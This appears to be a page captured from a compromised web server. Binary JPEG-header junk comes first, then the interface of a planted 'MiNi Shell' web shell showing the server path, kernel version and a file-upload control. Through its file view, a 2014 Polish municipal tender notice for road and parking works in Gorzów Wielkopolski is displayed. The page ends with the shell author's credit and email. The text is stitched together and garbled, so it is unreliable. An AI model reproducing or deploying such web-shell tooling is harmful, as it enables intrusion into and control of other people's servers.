JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140314/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140314/85890-N-2014.html

<p class="kh_header"><b>Gorzów Wielkopolski: Budowa parkingów przy szpitalu wraz z przebudową ulicy Dekerta</b><br>
<b>Numer ogłoszenia: 85890 - 2014; data zamieszczenia: 14.03.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miasto Gorzów Wlkp. , ul. Sikorskiego 3-4, 66-400 Gorzów Wielkopolski, woj. lubuskie, tel. 095 7355576, faks 095 7355612.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> bip.wrota.lubuskie.pl/umgorzow</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa parkingów przy szpitalu wraz z przebudową ulicy Dekerta.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są roboty budowlane związane z przebudową drogi gminnej nr  100719F - ulicy Dekerta wraz z budową zatoki parkingowej i miejsc postojowych usytuowanych w pasie drogowym ulicy Dekerta  w Gorzowie Wlkp. Przebudowa ul. Dekerta będzie dotyczyć odcinka  o długości ok. 930m od skrzyżowania z ul. ks. A. Czartoryskiego do ul. Wyszyńskiego i będzie realizowana w ramach zadania inwestycyjnego pn.: Budowa parkingów przy szpitalu wraz z przebudową ulicy Dekerta.

1.  ZAKRES PLANOWANYCH DO WYKONANIA ROBÓT BĘDZIE OBEJMOWAĆ 
W SZCZEGÓLNOŚCI:
1) Tablice informacyjne:  zakup i montaż,
2) Tymczasowa organizacja ruchu, a w szczególności:  wykonanie objazdów tymczasowych wraz z oznakowaniem pionowym i poziomym, wykonanie i utrzymanie tymczasowych dróg dojazdowych, wykonanie chodników tymczasowych, kładek dla pieszych, podestów, sygnalizacji świetlnej, zabezpieczeń wygradzających plac budowy.
3) Stała organizacja ruchu, a w szczególności oznakowanie pionowe i poziome
4)Branża drogowa:
a)roboty pomiarowe,
b)rozbiórka elementów dróg, nawierzchni chodników, krawężników i obrzeży, oznakowania pionowego, gazonów, 
c)karczowanie pni po wyciętych drzewach,
d)usuniecie krzewów,
e)wywóz i utylizacja gruzu,
f)roboty drogowe:  roboty ziemne, wykonanie koryta, wykonanie nasypów, zagęszczenie podłoża, wykonanie podbudowy, wykonanie warstw konstrukcyjnych i nawierzchni jezdni, zjazdów, chodników, parkingów, ścieżki rowerowej, wraz z krawężnikami i obrzeżami,
g)zagospodarowanie zieleni:   sadzenie drzew i krzewów z zaprawą dołów, dostawa i montaż donic betonowych, wykonywanie trawników,  
h)urządzenia bezpieczeństwa ruchu:  oznakowanie poziome i pionowe, poręcze ochronne,
i)dostawa i montaż stojaków rowerowych,
j)dostawa i montaż elementów małej architektury:  ławek, koszy na śmieci.
5)Branża sanitarna
a)roboty ziemne:  wykopy, umocnienie ścian wykopów, odwodnienie wykopów, zasypanie i zagęszczenie wykopów, 
b) sieć  kanalizacji deszczowej:  rozbiórka istniejącej kanalizacji deszczowej, budowa kanalizacji  deszczowej wraz z studzienkami i wpustami ulicznymi,
c) roboty montażowe rur kanalizacyjnych, studni rewizyjnych, studzienek systemowych, podłączenie kanalizacji do istniejących studni, 
d) próba szczelności kanałów,
e) kontrola wykonania sieci kanalizacji deszczowej kamerą telewizyjną,
f) hydranty pożarowe podziemne.
6) Branża elektroenergetyczna: 
a) demontaż i utylizacja oświetlenia drogowego,
b) budowa oświetlenia drogowego:  
-  zasilanie i montaż szafki oświetleniowej,  wykonanie rowów, ułożenie i zasypanie kabla z zagęszczeniem rowu, pomiary  uziemienia ochronnego,
-  zasilanie oświetlenia drogowego obwód nr I , wykonanie rowów, ułożenie i zasypanie kabla z zagęszczeniem rowu, pomiary uziemienia ochronnego,
-  zasilanie oświetlenia drogowego obwód nr II , wykonanie rowów, ułożenie i zasypanie kabla z zagęszczeniem rowu, pomiary  uziemienia ochronnego,
-  montaż słupów oświetleniowych,
-  powiązanie istniejącego słupa nr SO-063/l/25 z istniejącym słupem nr SO-166/III/15 przy  ul. ks. A. Czartoryskiego.
7)Branża telekomunikacyjna:
a)sieć ORANGE TP S.A. -  podwyższenie włazu studni, wymiana ramy studni, wymiana pokryw studni. 
b)sieć MMP S.A. - wymiana ramy studni, wymiana pokryw studni. 
2. ZESTAWIENIE PODSTAWOWYCH POWIERZCHNI PROJEKTOWANYCH:
- jezdnia o nawierzchni z mieszanki SMA -  ok. 8 068 m2
- zatoki autobusowe o nawierzchni betonowe -  ok. 114 m2
- miejsca postojowe parkingi -  ok. 249 miejsc 
- chodnik o nawierzchni z kostki brukowej -  ok. 3 121 m2
- ścieżka rowerowa -  ok. 1 170  m2
- słupy oświetleniowe -  34 szt.
- zieleń - drzewa -  19 szt.
- zieleń - krzewy -  786 szt.
- zieleń - trawniki -  ok. 4 030 m2.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zgodnie z art. 67 ust. 1 pkt 6 stawy Pzp. Zamawiający przewiduje udzielenie zamówień uzupełniających stanowiących nie więcej niż 50 % wartości zamówienia podstawowego, polegających na powtórzeniu tego samego rodzaju zamówień, opisanych w niniejszej SIWZ.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.30.00-9, 45.23.10.00-5, 45.31.61.10-9, 45.23.14.00-9, 45.23.23.10-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.11.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 140 000,00 zł (słownie:  sto czterdzieści tysięcy zł)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.
Zamawiający dokona oceny spełniania warunku udziału w postępowaniu w tym zakresie na podstawie oświadczenia złożonego na druku stanowiącym Załącznik Nr 2 do SIWZ.
Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia w oparciu o analizę oświadczeń i dokumentów potwierdzających spełnienie warunków</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony w tym zakresie, jeżeli Wykonawca wykaże, że w ciągu ostatnich pięciu lat przed upływem terminu  składania ofert (a jeżeli okres prowadzenia działalności jest krótszy - to w tym okresie)  wykonał w sposób należyty, zgodnie z zasadami sztuki budowlanej i prawidłowo ukończył:
- co najmniej dwie roboty budowlane polegające na budowie/rozbudowie/przebudowie drogi 
o nawierzchni asfaltowej na odcinku o długości co najmniej 500m, 
- co najmniej dwie roboty budowlane polegające na budowie/rozbudowie/przebudowie kanalizacji deszczowej na odcinku o długości min. 200mb, 
- co najmniej dwie roboty budowlane polegające na budowie/rozbudowie/przebudowie oświetlenia na odcinku o długości min. 200mb,
Wykonawca załączy dowody określające, czy roboty te zostały wykonane w sposób należyty i wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone.
Zamawiający dokona oceny spełniania warunku udziału w postępowaniu w tym zakresie na podstawie wykazu robót  złożonego na druku stanowiącym Załącznik Nr 4 do SIWZ
Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia w oparciu o analizę oświadczeń i dokumentów potwierdzających spełnienie warunków</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.
Zamawiający dokona oceny spełniania warunku udziału w postępowaniu w tym zakresie na podstawie oświadczenia złożonego na druku stanowiącym Załącznik Nr 2 do SIWZ
Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia w oparciu o analizę oświadczeń i dokumentów potwierdzających spełnienie warunków</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony w tym zakresie, jeżeli Wykonawca wykaże, że osoby, które będą uczestniczyć w wykonaniu zamówienia posiadają kwalifikacje zawodowe, doświadczenie i wykształcenie niezbędne do jego realizacji, a także przedstawi informację o podstawie dysponowania tymi osobami, tj:
- osoba (kierownik budowy) posiadająca uprawnienia budowlane w specjalności drogowej,   
- osoba (kierownik robót branży sanitarnej) posiadająca uprawnienia budowlane w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń,  
- osoba (kierownik robót branży elektro-energetycznej) posiadająca uprawnienia budowlane 
w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń,  

lub ważne uprawnienia odpowiadające uprawnieniom budowlanym wydanym na podstawie wcześniej obowiązujących przepisów. 
Zamawiający dokona oceny spełniania warunku udziału w postępowaniu w tym zakresie na podstawie wykazu osób złożonego na druku stanowiącym Załącznik Nr 5 do SIWZ. 
Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia w oparciu o analizę oświadczeń i dokumentów potwierdzających spełnienie warunków</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczegółowego warunku w tym zakresie.
Zamawiający dokona oceny spełniania warunku udziału w postępowaniu w tym zakresie na podstawie oświadczenia złożonego na druku stanowiącym Załącznik Nr 2 do SIWZ.
Ocena spełniania w/w warunków dokonana zostanie zgodnie z formułą spełnia - nie spełnia w oparciu o analizę oświadczeń i dokumentów potwierdzających spełnienie warunków.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Upoważnienie dla osoby reprezentującej Wykonawcę, o ile nie wynika to z innych dokumentów. W przypadku zawiązania konsorcjum należy załączyć pełnomocnictwo dla podmiotu reprezentującego kilku Wykonawców. 2. Dowód wniesienia wadium (kserokopia), 3. Oryginał pisemnego zobowiązania innych podmiotów do oddania do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia, jeżeli, Wykonawca wskazał, że polega na zasobach innych podmiotów. 4.Zakres zamówień, które zostaną zlecone podwykonawcom</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość dokonania zmian postanowień zawartej umowy: 
1. Zmiana Umowy może nastąpić z inicjatywy Zamawiającego albo Wykonawcy, pod warunkiem zaistnienia okoliczności wymienionych w niniejszym Rozdziale. Wykonawca w tym celu winien przedstawić Zamawiającemu propozycję zmian w formie pisemnej, które powinny zawierać: 
1) opis zmiany,
2) uzasadnienie zmiany,
3) analizę kosztów zmiany oraz jego wpływu na wysokość wynagrodzenia,
4) czas wykonania zmiany oraz wpływ zmiany na termin zakończenia umowy.
2. Zmiana postanowień umowy może nastąpić jedynie za zgodą obu Stron i będzie wymagać formy pisemnego aneksu podpisanego przez obie strony pod rygorem nieważności.
3. Zmiana Umowy może nastąpić  w przypadku zaistnienia następujących okoliczności:
1) z powodu zaistnienia omyłki pisarskiej lub rachunkowej,
2)  gdy zaistnieje siła wyższa lub inna, niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy zgodnie z SIWZ lub wprowadzenie tych zmian jest korzystne  dla Zamawiającego.
3)  nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu umowy lub świadczenia jednej lub obu Stron,
4)  powstania rozbieżności lub niejasności w rozumieniu pojęć użytych w Umowie, których nie będzie można usunąć w inny sposób, a zmiana będzie umożliwiać usunięcie rozbieżności lub niejasności i doprecyzowanie Umowy w celu jednoznacznej interpretacji jej postanowień przez Strony, 
5) powstania nowych obowiązków wynikających z wytycznych Narodowego Programu Przebudowy Dróg Lokalnych - Etap II Bezpieczeństwo - Dostępność - Rozwój, z których realizacja zadania będzie finansowana,
6) gdy konieczność wprowadzenia zmian będzie następstwem zmian wprowadzonych w Umowie pomiędzy Zamawiającym a Wykonawcą, a w szczególności konieczności wprowadzenia  rozwiązań zamiennych w stosunku do dokumentacji projektowej, dokonania zmiany kolejności wykonania robót, określonej uaktualnionym harmonogramem rzeczowo-finansowym.
7) z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu umowy proponowanych przez Zamawiającego lub Wykonawcę, które zaakceptuje na piśmie Zamawiający.
8) wystąpienia innych okoliczności opisanych w p-cie 4-6 poniżej.
4. Dopuszcza się możliwość zmiany wynagrodzenia:
1) jeżeli nastąpi zmiana stawki podatku VAT, która będzie powodować zmianę kosztów  wykonania po stronie Wykonawcy. Zmiana wynagrodzenia będzie dotyczyła wynagrodzenia za część robót wykonywanych po dacie wejścia w życie przepisów stanowiących o zmianie stawki VAT, przy czym podwyższenie wynagrodzenia Wykonawcy o zmianę stawki podatku VAT nie dotyczy sytuacji, gdy zwłoka Wykonawcy w wykonaniu przedmiotu umowy spowodowała konieczność jego realizacji w okresie obowiązywania wyższej stawki podatku VAT,
2)  w przypadku wyłączenia części robót objętych umową na wniosek Zamawiającego,
3)  jeżeli powstanie konieczność zrealizowania przedmiotu umowy przy zastosowaniu innych  rozwiązań technicznych / technologicznych / materiałowych od tych wskazanych w  dokumentacji projektowej, wprowadzanych w sytuacji:
a)  gdyby zastosowanie przewidzianych w dokumentacji projektowej rozwiązań groziłoby niewykonaniem lub wadliwym wykonaniem przedmiotu umowy,
b) zaistnienia odmiennych od przyjętych w dokumentacji projektowej warunków geologicznych, skutkujących niemożliwością zrealizowania przedmiotu umowy przy  pierwotnie przyjętych założeniach technologicznych,
c) zaistnienia odmiennych od przyjętych w dokumentacji projektowej warunków terenowych, a  w  szczególności gdy zostanie stwierdzone istnienie nieujętych w dokumentacji projektowej podziemnych urządzeń, sieci uzbrojenia terenu,  instalacji  lub  obiektów infrastrukturalnych,     
d) jeżeli rozwiązania te będą miały znaczący wpływ na obniżenie kosztów eksploatacji, poprawy bezpieczeństwa, które ze względu na postęp techniczno-technologiczny nie były znane w okresie opracowywania dokumentacji projektowej, 
e) ze względu na postanowienia decyzji organów administracji państwowej  lub z uwagi na  korzyści dla Zamawiającego.
4) w przypadku zmian ilości i zakresu faktycznie wykonanych robót - na podstawie  Księgi Obmiaru zatwierdzonej przez Nadzór Inwestorski i Zamawiającego.
5. Dopuszcza się możliwość zmiany terminu  realizacji robót budowlanych w przypadku:
1) wystąpienia wykopalisk archeologicznych uniemożliwiających wykonanie robót,
2) szczególnie niesprzyjających warunków atmosferycznych uniemożliwiających prowadzenie robót budowlanych,  przeprowadzanie prób i sprawdzeń, dokonywanie odbiorów (poza warunkami charakterystycznymi dla danej pory roku),
3) odmiennych od przyjętych w dokumentacji projektowej warunków  geologicznych,
4) odmiennych od przyjętych w dokumentacji projektowej warunków terenowych (zagospodarowania terenu), w   szczególności istnienie podziemnych urządzeń, sieci uzbrojenia, instalacji lub obiektów  infrastrukturalnych,
5) wstrzymania robót przez  Zamawiającego, ale z wykluczeniem sytuacji kiedy wstrzymanie robót jest spowodowane z winy Wykonawcy, a w szczególności gdy ujawniły się nieprawidłowości w jakości, technologii robót, materiałów,
6) wystąpienia konieczności udzielenia zamówienia dodatkowego, spełniającego warunki jego udzielenia opisane w § 6 Projektu  umowy,
7) wystąpienia konieczności wprowadzenia zmian do przedmiotu umowy na skutek wydanych decyzji administracyjnych lub wymogu uzyskania decyzji lub uzgodnienia pod warunkiem wprowadzenia określonej modyfikacji,
8) wystąpienia problemów z uzyskaniem decyzji administracyjnych, uzgodnień i uzyskania opinii, przy dołożeniu należytej staranności ze strony Wykonawcy,
9)  zawieszenia robót przez organy nadzoru budowlanego z przyczyn niezależnych od Wykonawcy,
10) działania osób trzecich, które to działania uniemożliwią wykonanie lub kontynuacje prac,
11) zmiany regulacji prawnych obowiązujących po dniu zawarcia umowy,
12) zmiany terminu dokonania prób końcowych i wniosków o dokonanie prób dodatkowych nieobjętych umową,
13) wystąpieniu siły wyższej opisanej w § 14 Projektu umowy.
6. Dopuszcza się zmianę osób odpowiedzialnych za wykonanie przedmiotu umowy, przedstawionych w ofercie, w następujących przypadkach:
1) śmierci, przewlekłej choroby lub innego zdarzenia losowego,
2) pisemnej rezygnacji tych osób z wykonywania swoich obowiązków,
3) nie wywiązywania się osób z obowiązków wynikających z umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> bip.wrota.lubuskie.pl/umgorzow<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Gorzowa Wlkp. ul.Sikorskiego 3-4, 66-400 Gorzów Wlkp. pok. 315. Koszt wydrukowanej SIWZ wraz ze wszystkimi jej częściami: 715,00 zł Forma płatności: przelew..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 01.04.2014 godzina 10:30, miejsce: Urzędzie Miasta Gorzowa Wlkp. ul. Sikorskiego 3-4, Kancelaria ogólna (parter).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zadanie jest współfinansowane ze środków Narodowego Programu Przebudowy Dróg Lokalnych - Etap II Bezpieczeństwo - Dostępność - Rozwój..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com